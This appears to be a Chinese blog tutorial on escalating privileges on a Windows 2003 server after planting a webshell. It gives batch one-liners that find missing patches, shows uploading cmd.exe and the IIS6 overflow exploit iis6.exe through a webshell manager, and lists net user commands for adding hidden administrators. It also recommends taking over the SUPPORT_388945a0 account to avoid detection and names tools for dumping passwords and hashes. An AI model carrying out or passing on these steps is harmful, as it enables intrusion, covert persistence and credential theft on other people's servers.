Windows 提权------IIS6.exe溢出提权
操作系统漏洞提权:
systeminfo
查看未修补的补丁编号
KB952004 MS09-012 PR -pr.exe
KB956572 MS09-012 巴西烤肉
KB970483 MS09-020 IIS6溢出 -iis6.exe
LPK劫持 -lpk.dll
windows 2003>>
systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3057191
KB2840221 KB3000061 KB2850851 KB2711167 KB2360937
KB2478960 KB2507938 KB2566454 KB2646524 KB2645640
KB2641653 KB944653 KB952004 KB971657 KB2620712
KB2393802 KB942831 KB2503665 KB2592799 KB956572
KB977165 KB2621440) do @type C:\Windows\Temp\temp.txt|
@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:\Windows
\Temp\temp.txt
通用型>>
systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3124280
KB3143141 KB3134228 KB3079904 KB3077657 KB3124280
KB3045171 KB2829361 KB3000061 KB2850851 KB2707511
KB970483 KB2124261 KB2271195) do @type C:\Windows
\Temp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /
q /a C:\Windows\Temp\temp.txt
查看未补漏洞 根据没有修补的补丁号码,到网上找利用程序 进行利用
提权的思路
- 查找可读可写目录。
- 上传cmd.exe
- 查看未修补补丁的漏洞编号,根据没有修补的补丁号码,到网上寻找利用程序,进行利用。
- 上传exp进行利用。
拿到一个WebShell 之后上传大马
查看组件支持是否支持wscript.shell命令执行组件。
执行Webshell 自带的cmd.exe 发现不可用
提示拒绝访问 说明权限不允许,我们自己上传一个cmd.exe。上传目录要求是:可读,可写,可执行
利用菜刀上传一个cmd.exe
Network Service是Windows 2003中新内置的一个被严格限制的账号。该用户可以执行一些简单的命令. 但不能直接net user 添加用户。
接下来我们执行检测 补丁号的脚本
systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3124280 KB3143141 KB3134228 KB3079904 KB3077657 KB3124280 KB3045171 KB2829361 KB3000061 KB2850851 KB2707511 KB970483 KB2124261 KB2271195) do @type C:\Windows \Temp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f / q /a C:\Windows\Temp\temp.txt
发现可以使用IIS6.0溢出提权
使用菜刀上传 iis6.exe (这里我将iis6.0exe改名为了huangxin6.exe)
NT AUTHORITYSYSTEM代表程序以系统身份运行,这是两个系统内置的系统账户。
system账户具有比administration更高的权限。接下来 可以
修改管理员密码
创建一个新用户 添加到管理员组
提取当前登录用户密码 (Getpass.exe)
修改帮助账号(SUPPOTR_388945a0)的密码,并添加管理员组 (比较不容易被发现,推荐使用)
提取用户密码哈希值(wce.exe)net user 查看所有用户
query user 查看当前运行中的用户net user 用户名 密码 /add 添加用户
net user 用户名 /active **用户net user 用户名 密码 修改用户名密码net localgroup administrators 用户名 /add 添加管理组
下一篇: 贪吃蛇(android版)